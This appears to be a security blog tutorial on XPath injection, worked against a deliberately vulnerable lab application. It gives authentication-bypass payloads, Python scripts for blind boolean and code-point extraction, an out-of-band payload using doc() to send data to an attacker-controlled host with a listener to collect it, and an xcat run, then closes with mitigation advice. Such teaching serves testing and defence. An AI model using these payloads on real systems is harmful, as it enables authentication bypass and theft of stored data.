Exploring XPath in XML documents

What is XPATH?

XPATH is a standard language used to query and navigate XML documents. It uses path expressions to select nodes from an XML document based on given criteria.
Think of it as SQL for XML.

Let us take an example. Suppose our XML document is in the format below.

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user id='1'>
        <username>jason</username>
        <password>passjason</password>
    </user>
    <user id='2'>
        <username>chris</username>
        <password>chrispass</password>
    </user>
</users>

To extract information about the user named jason, our XPATH query would be: /users/user[username/text()='jason']

This query will retrieve all the data from the user element where username matches jason.
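
As a quick illustration, here is a minimal Python sketch that runs an equivalent query with the standard library's xml.etree.ElementTree. ElementTree implements only a subset of XPath and does not support text(), so the predicate is written as [username='jason'], which compares the element's text. The XML declaration is omitted for brevity, and the variable names are only illustrative.

```python
import xml.etree.ElementTree as ET

USERS_XML = """
<users>
    <user id='1'>
        <username>jason</username>
        <password>passjason</password>
    </user>
    <user id='2'>
        <username>chris</username>
        <password>chrispass</password>
    </user>
</users>
"""

root = ET.fromstring(USERS_XML)  # root is the <users> element

# Relative form of /users/user[username/text()='jason']
matches = root.findall("./user[username='jason']")

for user in matches:
    print(user.get("id"), user.findtext("username"), user.findtext("password"))
```

A full XPath engine would accept the original expression unchanged; the rewrite here is only needed because of ElementTree's reduced syntax.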

Now you might be wondering how we arrived at this query. Don’t worry! Let me walk you through some of the most commonly used expressions.

XPATH Expressions

Expression	Details
/	Selects from the root (document) node
//	Selects matching nodes anywhere in the document, regardless of their position
node_name	Selects all nodes named ‘node_name’
@	Selects attributes
[condition]	Selects all nodes that match the defined condition
*	Matches any element node

With this knowledge, we can rewrite the XPATH query above as either of the following:

//user[username/text()='jason']
//user[@id='1']
I’ll leave the rest for you to explore.
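
The expressions from the table can be tried out with a short Python sketch. It again uses xml.etree.ElementTree, where a leading .// plays the role of // relative to the parsed root element. The trimmed-down document and the variable names are assumptions made for the example.

```python
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<users>"
    "<user id='1'><username>jason</username></user>"
    "<user id='2'><username>chris</username></user>"
    "</users>"
)

# //user[@id='1'] : any <user> in the document whose id attribute is 1
by_id = doc.findall(".//user[@id='1']")

# //user/* : '*' matches every child element of each <user>
children = doc.findall(".//user/*")

# [@id] keeps only elements that carry the attribute; .get() reads its value
ids = [u.get("id") for u in doc.findall(".//user[@id]")]

print(by_id[0].findtext("username"), [c.tag for c in children], ids)
```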

Attacking XPATH Queries

According to PortSwigger:

XPath injection vulnerabilities arise when user-controllable data is included in XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Similar to SQL Injection, XPath Injection can be used to bypass business logic, escalate user’s privileges, and leak sensitive data. Successful exploitation of this flaw often leads to the compromise of the entire XML database.

Detection

Detection is quite similar to SQL Injection. The first step is to insert a single quote (') in the field being tested, which introduces a syntax error in the query, and then check whether the application returns an error message.

In cases where error messages are suppressed, we can switch to Boolean-based Injection techniques, making the query either TRUE or FALSE.

A few points to note:

Unlike SQL, XPATH 1.0 has no comment syntax, so the rest of a query cannot simply be commented out.
Unlike SQL, XPATH is case-sensitive.

Exploitation

Let’s start with basic exploitation to bypass authentication. Suppose the application uses the following query for authentication:

string(//user[username/text()='<user-input>' and password/text()='<user-input>']/account/text())

Because the XPath language does not allow the rest of the query to be commented out, exploitation becomes a bit trickier due to the presence of the Boolean operator AND.

In this case, suppose the tester supplies the following values:

username= ' or '1'='1
password= ' or '1'='1

The query then becomes:
string(//user[username/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())

Because and binds more tightly than or, the predicate ends with or '1'='1' and is therefore true for every user node, so the application will authenticate the user.
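
The following Python sketch shows how naive string interpolation produces the injected query above, and why its predicate is always true. The function build_auth_query is hypothetical; it only stands in for whatever code the vulnerable application uses to assemble the expression. The payload used is the one that yields the query shown above.

```python
def build_auth_query(username: str, password: str) -> str:
    """Build the authentication query by naive string interpolation (unsafe)."""
    return (
        f"string(//user[username/text()='{username}' "
        f"and password/text()='{password}']/account/text())"
    )

payload = "' or '1'='1"
query = build_auth_query(payload, payload)
print(query)

# 'and' binds more tightly than 'or' in XPath, so the predicate groups as:
#   (username = '') or ('1'='1' and password = '') or ('1'='1')
# Python uses the same precedence, so the logic can be mirrored directly.
username_matches = False  # no user has an empty username
password_matches = False  # no user has an empty password
predicate = username_matches or (True and password_matches) or True
print(predicate)
```

The trailing or '1'='1' is what decides the outcome: it is true regardless of the stored usernames and passwords.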

Blind Exploitation

The XPATH language has no statement similar to UNION in SQL, so to dump the whole XML database we have to switch to blind exploitation techniques.

For demonstration purposes, we’ll be using a vulnerable application found on GitHub.

Manual Approach

The application allows us to search for books. It also displays the query used by the backend, but let’s ignore that for a moment.

Let’s start with our usual fuzzing. On inserting a single quote ('), the application returns an error.

On further fuzzing, we find that the input a') and ('1'='1 completes the query, making the final query:
/root/books/book[contains(title/text(), 'a') and ('1'='1')]

If we change the input to a false condition (for example, '1'='2), the application returns 0 results.

Now that we know how the application behaves for true and false conditions, we can craft payloads to dump the backend database.

From the XPATH documentation, we found a few interesting functions which can be useful such as count, substring, and others.

Next, we need to find the structure of the document. To do this, we will use the count function to get a basic understanding of the document.

a') and count(/*)>1 and ('1'='1 -> returns FALSE
a') and count(/*)=1 and ('1'='1 -> returns TRUE

This confirms that the document contains one root node.

Similarly,

a') and count(/*[1]/*)=2 and ('1'='1 -> returns TRUE

This means the root node has two child elements. Using this technique, we can enumerate the whole structure of the XML document.
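
The counting step can be automated. Below is a minimal Python sketch under a few assumptions: oracle is a hypothetical callable that submits a condition to the application and returns True when results come back, and wrap and count_children are illustrative helper names. The fake_oracle function is only a stand-in so the sketch runs without a target.

```python
from typing import Callable

# An oracle takes an XPath boolean condition and reports whether the
# application behaved as TRUE (results shown) or FALSE (no results).
Oracle = Callable[[str], bool]

def wrap(condition: str) -> str:
    """Embed a condition in the search-field payload used in this walkthrough."""
    return f"a') and {condition} and ('1'='1"

def count_children(oracle: Oracle, path: str, limit: int = 50) -> int:
    """Find count(path/*) by testing 0, 1, 2, ... until the oracle says TRUE."""
    for n in range(limit + 1):
        if oracle(f"count({path}/*)={n}"):
            return n
    raise ValueError(f"more than {limit} children under {path}")

# Stand-in oracle for demonstration only; a real one would send
# wrap(condition) to the target and inspect the response.
def fake_oracle(condition: str) -> bool:
    return condition == "count(/*[1]/*)=2"

print(wrap("count(/*[1]/*)=2"))
print(count_children(fake_oracle, "/*[1]"))
```

Calling count_children again with deeper paths such as /*[1]/*[1] would walk the rest of the tree in the same way.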

Once we know the structure, we can start enumerating the names of the elements. For this purpose, we can use the name() function. As it’s blind, we’ll have to enumerate its characters one-by-one with the help of the substring() function.

To find the name of the root element, our payload will be:
a') and substring(name(/*),1,1)='{char}' and ('1'='1
where {char} iterates over the characters a to z.
- name(/*): selects the name of the root node

To find the name of the child element of the root node:
a') and substring(name(/*[1]/*),1,1)='{char}' and ('1'='1
- name(/*[1]/*): selects the name of the first element in the root node
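
The character-by-character loop can be sketched in Python as follows. As before, oracle is a hypothetical callable that returns True when the injected condition holds; extract_name and the candidate alphabet are assumptions for the example, and fake_oracle simulates a document whose root element is named root.

```python
import re
import string
from typing import Callable

def extract_name(oracle: Callable[[str], bool], node: str, max_len: int = 32) -> str:
    """Recover name(node) one character at a time via substring()."""
    alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_-."
    name = ""
    for pos in range(1, max_len + 1):  # XPath string positions start at 1
        for ch in alphabet:
            if oracle(f"substring(name({node}),{pos},1)='{ch}'"):
                name += ch
                break
        else:
            return name  # no candidate matched: we are past the end of the name
    return name

# Stand-in oracle that answers as if the root element were called "root".
def fake_oracle(condition: str) -> bool:
    m = re.fullmatch(r"substring\(name\(/\*\),(\d+),1\)='(.)'", condition)
    pos, ch = int(m.group(1)), m.group(2)
    return "root"[pos - 1:pos] == ch

print(extract_name(fake_oracle, "/*"))
```

Each character costs up to one request per candidate in the alphabet, which is why the approach is slow against a real target.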

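This process can take some time, and it restricts the characters we test to a fixed set such as the ASCII range.

To get around this, the string-to-codepoints function (available from XPath 2.0) can be used; it returns the Unicode code points of the given string as a sequence of integers, which can then be compared numerically.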
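
One way to use numeric code points is a binary search per character instead of trying every candidate. The Python sketch below assumes an XPath 2.0 backend and the same hypothetical oracle callable as before; extract_codepoint is an illustrative name, and fake_oracle emulates a root element named root.

```python
import re
from typing import Callable

def extract_codepoint(oracle: Callable[[str], bool], expr: str, pos: int,
                      high: int = 0x10FFFF) -> int:
    """Binary-search the code point of the character at `pos` in `expr`.

    Returns 0 when there is no character at that position, because the
    comparison against an empty sequence is always false.
    """
    target = f"string-to-codepoints(substring({expr},{pos},1))"
    low = 0
    while low < high:
        mid = (low + high) // 2
        if oracle(f"{target}>{mid}"):
            low = mid + 1   # code point is above mid
        else:
            high = mid      # code point is mid or below
    return low

# Stand-in oracle that answers as if name(/*) were "root".
def fake_oracle(condition: str) -> bool:
    m = re.fullmatch(
        r"string-to-codepoints\(substring\(name\(/\*\),(\d+),1\)\)>(\d+)", condition
    )
    pos, bound = int(m.group(1)), int(m.group(2))
    ch = "root"[pos - 1:pos]
    return bool(ch) and ord(ch) > bound

print(chr(extract_codepoint(fake_oracle, "name(/*)", 1)))
```

With the default upper bound this takes roughly 21 requests per character for the full Unicode range; passing high=127 cuts it to 7 when the data is known to be ASCII.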

OOB Exploitation

The doc() function retrieves a document from a URI and returns the corresponding document node. It can load documents both locally and remotely.

If we pass an attacker-controlled URI to the function, such as doc(concat('http://attacker.com/', <value we want>)), the application will make an HTTP request to our server with the value we want to extract (for example, the name of the root node) embedded in the URL.

Our payload will be:
a') and doc(concat('http://172.17.0.1/data/?d=', name(/*)))/data and ('1'='1

Here:

- The application tries to fetch an XML file from the attacker-controlled URL.
- name(/*) returns the name of the root node of the XML document.
- /data tries to select the data element from the fetched XML file.

The name of the first node in our XML document is “root”. We can use the same technique to extract the name of its child node:
a') and doc(concat('http://172.17.0.1/data/?d=', name(/*[1]/*)))/data and ('1'='1

This way, we can enumerate and dump the whole document. This technique is considerably faster than Boolean-based injection, since each request leaks a whole value rather than a single true/false answer.
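
On the receiving side, any HTTP server that logs the request path will do. As one possible setup, the Python sketch below uses the standard library's http.server; leaked_value, LeakHandler, and serve are illustrative names, and the d parameter matches the payloads above. The handler replies with a small document containing a data element so that the /data step has something to select.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

def leaked_value(request_path: str) -> str:
    """Return the value of the 'd' query parameter, or '' if it is absent."""
    params = parse_qs(urlparse(request_path).query)
    return params.get("d", [""])[0]

class LeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("leaked:", leaked_value(self.path))
        # Answer with well-formed XML whose root element is <data/>.
        body = b"<data/>"
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def serve(port: int = 80) -> None:
    """Block forever, logging every leaked value; run on the attacker host."""
    HTTPServer(("0.0.0.0", port), LeakHandler).serve_forever()

print(leaked_value("/data/?d=root"))
```

Calling serve() on the host the payload points at (172.17.0.1 in this walkthrough) would print each extracted value as the requests arrive.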

Since URLs cannot contain arbitrary characters, we need to encode the extracted string with the encode-for-uri function so that it is safe to include in the HTTP request.
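
A payload that wraps the extracted value in encode-for-uri could be generated as in the Python sketch below. The helper name oob_payload is an assumption, and the base URL is the one used earlier in this walkthrough. The last line uses Python's urllib.parse.quote only to illustrate the kind of percent-encoding the listener would see for a value with spaces and special characters.

```python
from urllib.parse import quote

def oob_payload(base_url: str, expr: str) -> str:
    """Build the search-field payload that leaks `expr` via doc()."""
    return (
        f"a') and doc(concat('{base_url}', encode-for-uri({expr})))/data "
        "and ('1'='1"
    )

print(oob_payload("http://172.17.0.1/data/?d=", "name(/*)"))

# Comparable percent-encoding done locally, for ASCII input.
print(quote("The Great Gatsby & more", safe=""))
```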

Using Xcat

Xcat is a command-line tool for exploiting and investigating blind XPATH injection vulnerabilities. It makes exploitation much easier and faster: in the run below, it dumps the whole XML document in about 28 seconds.

time xcat run 'http://xpath.site:8000' query query=a --true-string Lawyer
...[snip]..

real    27.85s
user    21.26s
sys     1.41s
cpu     81%

Mitigation

There are several things that can be done to mitigate the risk of XPATH Injection:

Input Validation:
Always validate user input before using it in an XPATH expression; this helps prevent malicious input from being injected into the query.
Using Parameterized Queries:
Parameterized XPATH queries use placeholders for user-supplied input, which prevents malicious users from manipulating the structure of the query.
Using Precompiled XPATH Queries:
Precompiled XPATH queries are prepared before the program’s execution rather than built dynamically from user input. This reduces the risk of the query being manipulated.
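
As a rough sketch of the first and third ideas combined, the Python example below validates the username against an allow-list and runs only a constant XPATH expression, comparing the credentials in code. The names USERNAME_RE, is_valid_username, and authenticate, as well as the validation rule itself, are assumptions for illustration. Libraries with XPath variable support would be the natural way to implement true parameterized queries; this sketch does not cover them.

```python
import re
import xml.etree.ElementTree as ET

# Allow-list for usernames; adjust to the application's own rules.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def is_valid_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None

def authenticate(root: ET.Element, username: str, password: str) -> bool:
    """Fixed query plus comparison in code: input never becomes part of the XPath."""
    if not is_valid_username(username):
        return False
    for user in root.findall("./user"):  # constant expression, no user input
        if (user.findtext("username") == username
                and user.findtext("password") == password):
            return True
    return False

users = ET.fromstring(
    "<users>"
    "<user id='1'><username>jason</username><password>passjason</password></user>"
    "<user id='2'><username>chris</username><password>chrispass</password></user>"
    "</users>"
)

print(authenticate(users, "jason", "passjason"))
print(authenticate(users, "' or '1'='1", "' or '1'='1"))
```

Because the injected quote characters are only ever compared as plain strings, the payload from the authentication bypass example no longer changes the query structure.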

Conclusion

XPATH is a powerful tool for XML processing; however, it also carries a risk of exploitation through XPATH injection attacks if not handled properly.

In this blog, we explored different ways to exploit XPATH Injection and gained some insight into the potential consequences and effective mitigation strategies.

Thanks for reading; I hope you learned something new from this blog.
